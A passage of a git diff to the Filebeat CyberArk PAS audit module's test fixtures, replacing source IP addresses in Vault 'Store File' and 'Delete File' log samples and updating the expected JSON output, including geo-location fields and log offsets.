         "event.action": "store file",
         "event.code": "50",
@@ -154,25 +151,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1782,
+        "log.offset": 1781,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -186,11 +181,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:27Z",
         "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
         "cyberarkpas.audit.message": "Store File",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:27</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>50</MessageID>\n    <Desc>Store File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Store File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File>root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Store File</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:27</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>50</MessageID>\n    <Desc>Store File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Store File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File>root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Store File</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMRecordings",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:27",
         "event.action": "store file",
         "event.code": "50",
@@ -203,26 +198,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2374,
+        "log.offset": 2372,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -256,7 +248,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3898,
+        "log.offset": 3894,
         "log.syslog.priority": "5",
         "network.direction": "internal",
         "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log b/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log
index d9d8af79da43..f8464908b9bd 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log
@@ -1,9 +1,9 @@
 <5>1 2021-03-08T18:32:43Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:43","IsoTimestamp":"2021-03-08T18:32:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <5>1 2021-03-08T18:38:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:38:21","IsoTimestamp":"2021-03-08T18:38:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"VaultInternal","File":"Root\\Operating System-WinServerLocal-components-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinServerLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"LogonDomain","Value":"COMPONENTS"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <5>1 2021-03-08T19:20:04Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:04","IsoTimestamp":"2021-03-08T19:20:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PasswordManager","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PasswordManager_workspace","File":"Root\\Test_4","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}}
-<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:59:57</Timestamp>\n    <IsoTimestamp>2021-03-11T18:59:57Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMSessions</Safe>\n    <File>Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd</File>\n    <Station>35.192.121.42</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}}
+<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:59:57</Timestamp>\n    <IsoTimestamp>2021-03-11T18:59:57Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMSessions</Safe>\n    <File>Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd</File>\n    <Station>67.43.156.12</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}}
 <5>1 2021-03-11T19:32:12Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 11:32:12</Timestamp>\n    <IsoTimestamp>2021-03-11T19:32:12Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMPLiveSessions</Safe>\n    <File>Root\\PSMPApp_VAGRANT.LiveSessions</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"_PSMLiveSessions_1\" Value=\"\"></CAProperty>\n      <CAProperty Name=\"_PSMLiveSessions_2\" Value=\"\"></CAProperty>\n      <CAProperty Name=\"_PSMLiveSessions_3\" Value=\"\"></CAProperty>\n      <CAProperty Name=\"_PSMLiveSessions_4\" Value=\"\"></CAProperty>\n      <CAProperty Name=\"_PSMLiveSessions_5\" Value=\"\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:32:12","IsoTimestamp":"2021-03-11T19:32:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"_PSMLiveSessions_1","Value":""},{"Name":"_PSMLiveSessions_2","Value":""},{"Name":"_PSMLiveSessions_3","Value":""},{"Name":"_PSMLiveSessions_4","Value":""},{"Name":"_PSMLiveSessions_5","Value":""}]}}}}
-<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:06:40</Timestamp>\n    <IsoTimestamp>2021-03-11T21:06:40Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-PSMConnect</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"PSMConnect\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"35.192.121.42\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-35.192.121.42-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"35.192.121.42"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:06:40</Timestamp>\n    <IsoTimestamp>2021-03-11T21:06:40Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-PSMConnect</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"PSMConnect\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"67.43.156.12\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-67.43.156.12-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"67.43.156.12"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <5>1 2021-03-11T21:06:50Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 13:06:50</Timestamp>\n    <IsoTimestamp>2021-03-11T21:06:50Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\PSM-ASR-CYBERARK-WI</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"UserName\" Value=\"PSMConnect\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"10.128.0.65\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"ASR-CYBERARK-WI\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:50","IsoTimestamp":"2021-03-11T21:06:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"10.128.0.65"},{"Name":"LogonDomain","Value":"ASR-CYBERARK-WI"}]}}}}
 <5>1 2021-03-14T12:10:17Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:10:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:10:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\PSMAdmin</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"UserName\" Value=\"PSMAdminConnect\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"169.254.180.25\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"VAGRANT-2012-R2\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:10:17","IsoTimestamp":"2021-03-14T12:10:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMAdmin","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMAdminConnect"},{"Name":"Address","Value":"169.254.180.25"},{"Name":"LogonDomain","Value":"VAGRANT-2012-R2"}]}}}}
 <5>1 2021-03-15T15:09:00Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:09:00</Timestamp>\n    <IsoTimestamp>2021-03-15T15:09:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Database-Oracle-10.128.0.7-adrian</File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation>10.0.1.20</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"Oracle\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"10.128.0.7\"></CAProperty>\n      <CAProperty Name=\"Port\" Value=\"3306\"></CAProperty>\n      <CAProperty Name=\"Database\" Value=\"test\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Database\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:09:00","IsoTimestamp":"2021-03-15T15:09:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-Oracle-10.128.0.7-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"Oracle"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"10.128.0.7"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log-expected.json
index a0bfbd934d65..0716bf261f63 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log-expected.json
@@ -151,11 +151,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T18:59:57Z",
         "cyberarkpas.audit.issuer": "PSMApp_ASR-WIN",
         "cyberarkpas.audit.message": "Delete File",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:59:57</Timestamp>\n    <IsoTimestamp>2021-03-11T18:59:57Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMSessions</Safe>\n    <File>Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd</File>\n    <Station>35.192.121.42</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:59:57</Timestamp>\n    <IsoTimestamp>2021-03-11T18:59:57Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>52</MessageID>\n    <Desc>Delete File</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMApp_ASR-WIN</Issuer>\n    <Action>Delete File</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMSessions</Safe>\n    <File>Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd</File>\n    <Station>67.43.156.12</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Delete File</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMSessions",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 11 10:59:57",
         "event.action": "delete file",
         "event.code": "52",
@@ -175,18 +175,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -222,7 +220,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3907,
+        "log.offset": 3905,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
@@ -242,18 +240,18 @@
     {
         "@timestamp": "2021-03-11T21:06:40.000Z",
         "cyberarkpas.audit.action": "Delete File",
-        "cyberarkpas.audit.ca_properties.address": "35.192.121.42",
+        "cyberarkpas.audit.ca_properties.address": "67.43.156.12",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.user_name": "PSMConnect",
         "cyberarkpas.audit.desc": "Delete File",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-PSMConnect",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-PSMConnect",
         "cyberarkpas.audit.gateway_station": "10.0.1.20",
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T21:06:40Z",
